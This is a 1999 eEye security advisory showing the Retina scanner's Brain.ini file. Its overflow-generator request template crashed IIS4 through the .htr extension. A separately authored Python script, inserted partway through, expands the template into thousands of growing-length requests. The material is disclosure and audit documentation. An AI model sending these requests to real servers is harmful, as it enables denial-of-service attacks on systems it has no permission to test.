http://www.eeye.com/database/advisories/ad06081999/ad06081999.html

Retina vs. IIS4, Round 2

The Brain File

The following is a listing of the Brain.ini file that Retina uses for its Miner module. This is the actual file listing that uncovered the crash in IIS4. We trimmed out some variables that are not being used. We will explain more about how the brain file works below.

To install the brain file just copy it to the following path:

c:\program files\retina\modules\retina\miner\brain.ini

Downloads: brain.ini

[General]
Title=HTTP Miner

[Commands]
1=GET /%%passwordpath%%/%%$RPT(65,40,10)%%.%%extention%% HTTP/1.0

[Variables]
cgi-bin=cgi-bin,cgi,bin,cgibin,data,dat,exec,apps,secure,hide,
extention=html,htx,asp,exe,xml,ini,htr,txt,dat,dbf,lst,data,
passwordpath=password,passwords,pass,users,clients,admins,store,
passwordfile=password,passwords,pass,users,clients,admins,store,

How the brain file works

To explain the brain file we need to explore some of Retina's features and explain how brain files are constructed.

Retina's AI (Artificial Intelligence) Engine

The most limiting trait of a program is the rigidity of the code (logic) built into it. It is written by a human to handle a set feature of logic. So in the case of a network auditing tool, the logic is designed to handle what the programmer has instructed it to do. But what if the program has its own knowledge base, i.e. it records what it finds, then compares all of its findings and then catalogs the information based on a defined set of rules? As the application runs it will become familiar with the norm, be able to recognize the exception to the norm, and then be able to report the exception. This is one of the most powerful technologies in Retina, and is being used in two of the existing modules in a limited way; for security reasons we limited the capability of this feature set while we define how we can protect it from being abused.
Yes, this feature is very powerful and can be used to DoS (Denial of Service) servers and do data mining on server content.

The AI Engine at work

Here we will describe some of the data mining capabilities we currently have in Retina. The following capabilities might be disabled in current beta releases because of the security reasons mentioned above.

The Browser Module is used to collect links and action URLs from a web site to identify all third level domain names associated with the domain being scanned. As the domain list is built, Retina provides the list as an optional scan list. This capability will allow the auditor to identify all possible servers, applications and IP addresses that might be a weak link in the chain of security surrounding the domain.

The Tracer Module is used to perform a simple trace route to the target IP address. It is very simple in nature, but the information collected along the way can be a list of possible gateways, routers and/or proxies that need to be scanned to make sure that the security is audited at all entry points to the network.

The Scanner Module is used to scan for open ports. When an IP address has different open ports than the rest of the subnet, it is possible that special applications are running on that server or that a user is running a client application that has that port open. This can be used to identify the port and add it to a list of warnings that need to be checked.

The Brain File

The findings from the modules mentioned above are then logged in what we call a brain file. The brain file is a list of commands, variables and actions to be used in a time consuming auditing operation, much like brute forcing, but the variables are intelligently limited so the results are more accurate. Currently the only module we are releasing that acts upon this data is the Miner Module, which takes a brain file and constructs queries against web servers and reports anything other than "File not found".
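To make concrete how the Miner module turns the brain file listed above into a request set, here is an added Python example; it is not part of this advisory and not Retina's code. It parses the brain.ini listing, expands each %%name%% placeholder over the comma-separated values in [Variables], expands the $RPT(char,count,step) directive into count strings of that ASCII character with lengths step, 2*step, ... count*step, and summarizes what a web server would receive. The BRAIN_INI constant is a copy of the advisory's listing; dropping the empty entries produced by the listing's trailing commas is my assumption, as is the exact $RPT length progression.

```python
import itertools
import re

# Copy of the brain.ini listing from the advisory (constructed here as a string;
# the trailing commas on the variable lines are in the original listing).
BRAIN_INI = """\
[General]
Title=HTTP Miner
[Commands]
1=GET /%%passwordpath%%/%%$RPT(65,40,10)%%.%%extention%% HTTP/1.0
[Variables]
cgi-bin=cgi-bin,cgi,bin,cgibin,data,dat,exec,apps,secure,hide,
extention=html,htx,asp,exe,xml,ini,htr,txt,dat,dbf,lst,data,
passwordpath=password,passwords,pass,users,clients,admins,store,
passwordfile=password,passwords,pass,users,clients,admins,store,
"""

PLACEHOLDER = re.compile(r"%%(.*?)%%")          # %%name%% or %%$RPT(...)%%
RPT = re.compile(r"\$RPT\((\d+),(\d+),(\d+)\)")  # $RPT(char_code,count,step)


def parse_brain(text):
    """Parse the INI-style brain file into {section: {key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


def rpt_values(char_code, count, step):
    """Expand $RPT: `count` strings of chr(char_code), growing by `step` each time
    (assumed progression step, 2*step, ..., count*step)."""
    return [chr(char_code) * (step * i) for i in range(1, count + 1)]


def placeholder_values(name, variables):
    """Values a placeholder takes: either an $RPT expansion or a variable's list."""
    m = RPT.fullmatch(name)
    if m:
        return rpt_values(*(int(g) for g in m.groups()))
    # Trailing commas in the listing yield empty entries; drop them (assumption).
    return [v for v in variables[name].split(",") if v]


def expand_command(template, variables):
    """Produce every request line the template yields over all value combinations."""
    names = PLACEHOLDER.findall(template)
    choices = [placeholder_values(n, variables) for n in names]
    requests = []
    for combo in itertools.product(*choices):
        values = iter(combo)
        # re.sub calls the function once per placeholder, left to right
        requests.append(PLACEHOLDER.sub(lambda _m: next(values), template))
    return requests


def expand_brain(text):
    """Expand all [Commands] entries of a brain file, in key order."""
    brain = parse_brain(text)
    variables = brain.get("Variables", {})
    out = []
    for _key, template in sorted(brain.get("Commands", {}).items()):
        out.extend(expand_command(template, variables))
    return out


def summarize(requests):
    """Footprint of the request set: total count, longest request, .htr requests."""
    longest = max(requests, key=len)
    return {
        "count": len(requests),
        "longest_length": len(longest),
        "htr_requests": sum(r.split()[1].endswith(".htr") for r in requests),
    }


if __name__ == "__main__":
    reqs = expand_brain(BRAIN_INI)
    print(summarize(reqs))
    print(reqs[0])
```

For the listing above this yields 7 passwordpath values x 40 $RPT lengths x 12 extensions, 3360 request lines whose path component grows to 400 bytes of "A"; the 280 of them ending in .htr are the ones that reach the IIS4 ISAPI extension the advisory names. That shape (many requests for non-existent paths with steadily growing length) is what this scan looks like in a web server log.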
In the above example brain file, the Miner module generates commands based on a query command and all variables collected within the brain file. The directive "%%$RPT(65,40,10)%%" is an overflow generator: 65 is the ASCII character we want to repeat, 40 is the number of times we want to repeat the loop, and 10 is the length to increment the string by. In the variables section we list all the different words we want to try in all possible combinations. The htr extension is what brought our server down.

Copyright (c) 1999 eEye Digital Security Team

Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission.

Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Please send suggestions, updates, and comments to: eEye Digital Security Team info@eEye.com www.eEye.com